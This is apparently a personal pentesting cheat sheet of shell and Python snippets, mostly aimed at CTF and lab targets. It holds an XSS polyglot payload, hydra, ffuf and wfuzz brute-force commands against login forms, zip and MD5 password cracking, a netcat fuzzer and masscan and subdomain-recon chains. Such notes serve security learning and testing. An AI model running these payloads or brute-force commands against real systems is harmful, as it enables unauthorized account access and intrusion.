# script & command

#### System proxy in terminal:

<pre class="language-bash"><code class="lang-bash"><strong>export http_proxy=http://localhost:8080     ## for setting proxy
</strong>export https_proxy=http://localhost:8080
export all_proxy=socks://127.0.0.1:8080/
## uppercase variants of the same variables: ALL_PROXY, HTTP_PROXY, HTTPS_PROXY
unset http_proxy    ## for removing proxy
unset https_proxy
</code></pre>

#### Finding specific words:

```bash
find / -type f -exec grep -H 'HTTP_PROXY' {} \;

```

## simple fuzzer:

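```bash
#!/bin/bash
# Reads paths from stdin, requests each one, and prints the path with the response status line.
server=example.org
port=80
while read -r url
do
echo -ne "$url\t"
echo -e "GET /$url HTTP/1.0\nHost: $server\n" | netcat "$server" "$port" | head -1
done | tee outputfile
```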

## simple bash code for masscan:

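```bash
#!/bin/bash
# Strip the URL scheme from the first argument to get the bare hostname
strip=$(echo "$1" | sed 's/https\?:\/\///')
echo ""
echo "###########################"
host "$strip"
echo "###########################"
echo ""
# Scan the first resolved IPv4 address; output is also saved to <hostname>_scan
masscan -p1-65535 $(dig +short "$strip" | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | head -1) --max-rate 1000 |& tee "${strip}_scan"
```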

## Useful Bash Command:

***removing matching word:***

```
echo 'matching character' | sed 's/\<matching\>//g'
```

```
awk '{gsub("string to remove", "");print}' file-name 
```

**removing trailing dot:**   `sed 's/\.$//'`

**making each word a line:**

```
sed "s/ /\n/g"   
```

```
  tr ' ' '\n'
```

**example for loop:**   `for i in $(<assets2.booztcdn.txt) ; do (wget $i); done`

### adding word:

`while read -r line; do echo "$line.synology.com"; done < a.txt`

## Check for subdomain takeover:

```
subfinder -d yeswehack.com >> 1.txt && assetfinder --subs-only yeswehack.com >> 1.txt && amass enum -d yeswehack.com -config /home/shamim/.config/amass/config.ini >> 1.txt && sort -u 1.txt > 2.txt && cat 2.txt | nslookup | grep "canonical" >> 3.txt && awk '{gsub("canonical name =", "");print}' 3.txt | sed "s/ /\n/g" | sed 's/\.$//' | httpx -cname -probe -title -sc -server

```

## Polyglot:

```
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=a
lert()//>\x3e                           
```

## Hydra:

```bash
hydra -L rockyou.txt -p idk -t 20 35.227.24.107 https-post-form "/b02f939d67/login:username=^USER^&password=^PASS^:Invalid username"
```

```bash
hydra -l '' -P 3digits.txt -f -v 10.10.172.186 http-post-form "/login.php:pin=^PASS^:Access denied" -s 8000
```

### ffuf:

```bash
ffuf -u https://hackyholidays.h1ctf.com/secure-login -X POST -t 50 -fr "Invalid Username" -d "username=FUZZ&password=admin" -H "Content-Type: application/x-www-form-urlencoded" -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt
```

**BruteForce using wfuzz:**

```bash
wfuzz -c -w /tmp/wordlist.txt -d "log=elliot&pwd=FUZZ&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.199.89%2Fwp-admin%2F&testcookie=1" --hs "The password you entered for the username" http://10.10.199.89/wp-login.php
```

### Crack zip:

```bash
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt my_secure_files_not_for_you.zip
```

## Curl:

```bash
curl -v -k -H "X-Requested-With:com.hacker101.webdev" -F hmac=588ba7e947958cb39f2edebc8738d13a -F file=@test.zip https://3c9493b4eceaca14bf6a6b2e96d15c22.ctf.hacker101.com/upload.php -x http://127.0.0.1:8080
```

## Cracking md5:

```python
import hashlib

with open('rockyou.txt',encoding='utf8',errors='replace') as f:
    for line in f:
        h = line.strip() + "203.0.113.33"
        output = hashlib.md5(h.encode('utf-8')).hexdigest()
        if output == "5f2940d65ca4140cc18d0878bc398955":
            print("HIT: "+line.strip())
```


